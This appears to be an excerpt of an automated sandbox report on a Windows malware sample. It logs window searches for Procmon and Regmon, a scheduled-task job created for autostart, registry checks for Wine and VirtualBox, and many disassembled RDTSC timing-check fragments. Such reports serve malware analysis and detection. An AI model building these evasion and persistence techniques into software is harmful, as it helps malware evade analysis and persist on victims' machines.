Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe File created: C:\Windows\Tasks\skotes.job
Stores files to the Windows start menu directory
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAA55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6CAA55F0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6401E2 second address: 6401F1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6401F1 second address: 6401F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6401F7 second address: 6401FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6401FD second address: 640201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BF722 second address: 7BF726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BEB41 second address: 7BEB4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF40C70B056h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BEB4B second address: 7BEB4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1D19 second address: 7C1D23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FF40C70B056h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1D23 second address: 7C1D60 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF40CBDB926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push ecx 0x00000012 jmp 00007FF40CBDB939h 0x00000017 pop ecx 0x00000018 jmp 00007FF40CBDB92Ah 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 pushad 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1D60 second address: 7C1D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1D69 second address: 7C1D7C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF40CBDB926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1D7C second address: 7C1DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop ecx 0x00000008 pop eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FF40C70B058h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push 00000003h 0x00000025 push edi 0x00000026 jmp 00007FF40C70B061h 0x0000002b pop ecx 0x0000002c push 00000000h 0x0000002e jno 00007FF40C70B05Ch 0x00000034 push 00000003h 0x00000036 push edx 0x00000037 mov dword ptr [ebp+122D3543h], ebx 0x0000003d pop esi 0x0000003e call 00007FF40C70B059h 0x00000043 jnp 00007FF40C70B062h 0x00000049 jl 00007FF40C70B05Ch 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1DEE second address: 7C1DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1DF8 second address: 7C1DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1DFC second address: 7C1E00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1E00 second address: 7C1E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ebx 0x0000000c pushad 0x0000000d jmp 00007FF40C70B061h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1E20 second address: 7C1E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [eax] 0x00000008 jnc 00007FF40CBDB942h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007FF40CBDB928h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1F8D second address: 7C1F91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1F91 second address: 7C2000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 xor dword ptr [esp], 3CCD7935h 0x0000000e mov esi, dword ptr [ebp+122D2005h] 0x00000014 jmp 00007FF40CBDB932h 0x00000019 push 00000003h 0x0000001b add dword ptr [ebp+122D362Ah], ebx 0x00000021 push 00000000h 0x00000023 and cx, 9B4Ah 0x00000028 push 00000003h 0x0000002a pushad 0x0000002b mov ecx, dword ptr [ebp+122D28A0h] 0x00000031 jns 00007FF40CBDB929h 0x00000037 popad 0x00000038 push EE23D73Ah 0x0000003d push ebx 0x0000003e pushad 0x0000003f jns 00007FF40CBDB926h 0x00000045 push esi 0x00000046 pop esi 0x00000047 popad 0x00000048 pop ebx 0x00000049 xor dword ptr [esp], 2E23D73Ah 0x00000050 clc 0x00000051 lea ebx, dword ptr [ebp+12455BDEh] 0x00000057 push ecx 0x00000058 clc 0x00000059 pop esi 0x0000005a xchg eax, ebx 0x0000005b pushad 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C2101 second address: 7C2116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c pop ebx 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C21EC second address: 7C221D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40CBDB931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF40CBDB933h 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C221D second address: 7C2224 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C2224 second address: 7C2233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C2233 second address: 7C2239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D39A1 second address: 7D39A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D39A5 second address: 7D39AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E11EA second address: 7E11F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF40CBDB926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E11F4 second address: 7E1203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1203 second address: 7E1207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1207 second address: 7E120D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E14F3 second address: 7E14F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E14F9 second address: 7E1508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007FF40C70B05Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E17A4 second address: 7E17A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E17A8 second address: 7E17BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF40C70B060h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1A6B second address: 7E1A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF40CBDB92Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1A7B second address: 7E1A81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1A81 second address: 7E1A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FF40CBDB92Eh 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1A91 second address: 7E1ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF40C70B066h 0x0000000d pushad 0x0000000e ja 00007FF40C70B056h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1ABA second address: 7E1ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1C38 second address: 7E1C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1C3C second address: 7E1C45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1C45 second address: 7E1C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF40C70B060h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1C61 second address: 7E1C70 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF40CBDB926h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1C70 second address: 7E1C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E2027 second address: 7E2046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF40CBDB926h 0x0000000a je 00007FF40CBDB926h 0x00000010 jne 00007FF40CBDB926h 0x00000016 popad 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E2046 second address: 7E205E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF40C70B05Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E205E second address: 7E2062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E2062 second address: 7E2068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E21F5 second address: 7E2211 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FF40CBDB936h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E2211 second address: 7E222D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF40C70B062h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D7E9B second address: 7D7EA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D7EA1 second address: 7D7EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF40C70B064h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D7EBD second address: 7D7ECB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF40CBDB926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E24FB second address: 7E2518 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF40C70B063h 0x00000009 jc 00007FF40C70B056h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E2518 second address: 7E251C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E2F08 second address: 7E2F0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E2F0C second address: 7E2F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E2F12 second address: 7E2F28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF40C70B05Bh 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b push edi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E77D4 second address: 7E77ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF40CBDB935h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E64B3 second address: 7E64B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E6CB1 second address: 7E6CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E7ECC second address: 7E7F01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B061h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jp 00007FF40C70B060h 0x00000011 pushad 0x00000012 jng 00007FF40C70B056h 0x00000018 push eax 0x00000019 pop eax 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jng 00007FF40C70B05Ch 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E7F01 second address: 7E7F05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AE786 second address: 7AE78A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F0197 second address: 7F01A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FF40CBDB926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EF7E6 second address: 7EF7FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B061h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EF7FD second address: 7EF807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF40CBDB926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EF807 second address: 7EF80B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EF80B second address: 7EF81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EF81B second address: 7EF839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF40C70B056h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF40C70B061h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EF839 second address: 7EF83F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EF9B7 second address: 7EF9BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EF9BB second address: 7EF9C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EF9C1 second address: 7EF9C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
